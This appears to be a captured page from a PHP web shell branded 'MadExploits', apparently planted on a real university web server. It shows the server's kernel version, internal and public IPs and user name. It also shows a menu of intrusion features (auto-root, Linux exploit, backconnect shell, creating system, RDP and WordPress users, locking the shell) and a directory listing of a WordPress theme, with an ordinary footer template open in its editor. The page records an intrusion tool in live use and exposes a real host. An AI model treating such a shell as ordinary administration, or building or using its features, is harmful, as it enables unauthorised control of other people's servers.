Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.217.128.191
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
appadmin /
cesa2025 /
wp-content /
themes /
jannah /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxrwxr-x
buddypress
[ DIR ]
drwxrwxr-x
demos
[ DIR ]
drwxrwxr-x
framework
[ DIR ]
drwxrwxr-x
inc
[ DIR ]
drwxrwxr-x
languages
[ DIR ]
drwxrwxr-x
plugins
[ DIR ]
drwxrwxr-x
templates
[ DIR ]
drwxrwxr-x
404.php
1.41
KB
-rw-rw-r--
archive-web-story.php
1.11
KB
-rw-rw-r--
archive.php
1.38
KB
-rw-rw-r--
author.php
1.42
KB
-rw-rw-r--
buddypress.php
816
B
-rw-rw-r--
category.php
3.89
KB
-rw-rw-r--
comments.php
1.52
KB
-rw-rw-r--
footer.php
404
B
-rw-rw-r--
functions.php
4.5
KB
-rw-rw-r--
header.php
681
B
-rw-rw-r--
index.php
1.05
KB
-rw-rw-r--
page.php
590
B
-rw-rw-r--
rtl.css
39.93
KB
-rw-rw-r--
screenshot.jpg
60.18
KB
-rw-rw-r--
search.php
1.45
KB
-rw-rw-r--
sidebar-footer.php
2.85
KB
-rw-rw-r--
sidebar-shop.php
751
B
-rw-rw-r--
sidebar-slide.php
4.07
KB
-rw-rw-r--
sidebar.php
2.42
KB
-rw-rw-r--
single.php
359
B
-rw-rw-r--
style.css
704
B
-rw-rw-r--
tag.php
1.42
KB
-rw-rw-r--
template-authors.php
230
B
-rw-rw-r--
template-masonry.php
377
B
-rw-rw-r--
template-sitemap.php
227
B
-rw-rw-r--
wpml-config.xml
7.11
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sidebar-footer.php
<?php /** * The template for the Footer widgets area * */ defined( 'ABSPATH' ) || exit; // Exit if accessed directly if( tie_get_option( 'footer_widgets_'.$name ) ): $normal_width = ' normal-side'; $footer_layout = tie_get_option( 'footer_widgets_layout_'.$name ); $border_class = tie_get_option( 'footer_widgets_border_'.$name ) ? 'footer-boxed-widget-area' : ''; $footer_widget_1 = $footer_widget_2 = $footer_widget_3 = $footer_widget_4 = ''; # Footer Columns switch ( $footer_layout ){ case 'footer-1c': $footer_widget_1 = 'fullwidth-area tie-col-sm-12'; $normal_width = ''; break; case 'footer-2c': $footer_widget_1 = $footer_widget_2 = 'tie-col-sm-6'; break; case 'narrow-wide-2c': $footer_widget_1 = 'tie-col-sm-4'; $footer_widget_2 = 'tie-col-sm-8'; break; case 'wide-narrow-2c': $footer_widget_1 = 'tie-col-sm-8'; $footer_widget_2 = 'tie-col-sm-4'; break; case 'footer-3c': $footer_widget_1 = $footer_widget_2 = $footer_widget_3 = 'tie-col-sm-4'; break; case 'wide-left-3c': $footer_widget_1 = 'tie-col-sm-6'; $footer_widget_2 = $footer_widget_3 = 'tie-col-sm-3'; break; case 'wide-right-3c': $footer_widget_1 = $footer_widget_2 = 'tie-col-sm-3'; $footer_widget_3 = 'tie-col-sm-6'; break; case 'footer-4c': $footer_widget_1 = $footer_widget_2 = $footer_widget_3 = $footer_widget_4 = 'tie-col-md-3'; break; default: } $first_column = 'first-footer-widget-'.$name; $second_column = 'second-footer-widget-'.$name; $third_column = 'third-footer-widget-'.$name; $fourth_column = 'fourth-footer-widget-'.$name; if( is_active_sidebar( $first_column ) || is_active_sidebar( $second_column ) || is_active_sidebar( $third_column ) || is_active_sidebar( $fourth_column ) ){ ?> <div class="footer-widget-area <?php echo esc_attr( $border_class ) ?>"> <div class="tie-row"> <?php if ( is_active_sidebar( $first_column )): ?> <div class="<?php echo esc_attr( $footer_widget_1.$normal_width ) ?>"> <?php dynamic_sidebar( $first_column ); ?> </div><!-- .tie-col /--> <?php endif; ?> <?php if ( is_active_sidebar( $second_column )): ?> <div class="<?php echo esc_attr( $footer_widget_2.$normal_width ) ?>"> <?php dynamic_sidebar( $second_column ); ?> </div><!-- .tie-col /--> <?php endif; ?> <?php if ( is_active_sidebar( $third_column )): ?> <div class="<?php echo esc_attr( $footer_widget_3.$normal_width ) ?>"> <?php dynamic_sidebar( $third_column ); ?> </div><!-- .tie-col /--> <?php endif; ?> <?php if ( is_active_sidebar( $fourth_column )): ?> <div class="<?php echo esc_attr( $footer_widget_4.$normal_width ) ?>"> <?php dynamic_sidebar( $fourth_column ); ?> </div><!-- .tie-col /--> <?php endif; ?> </div><!-- .tie-row /--> </div><!-- .footer-widget-area /--> <?php } endif;
Close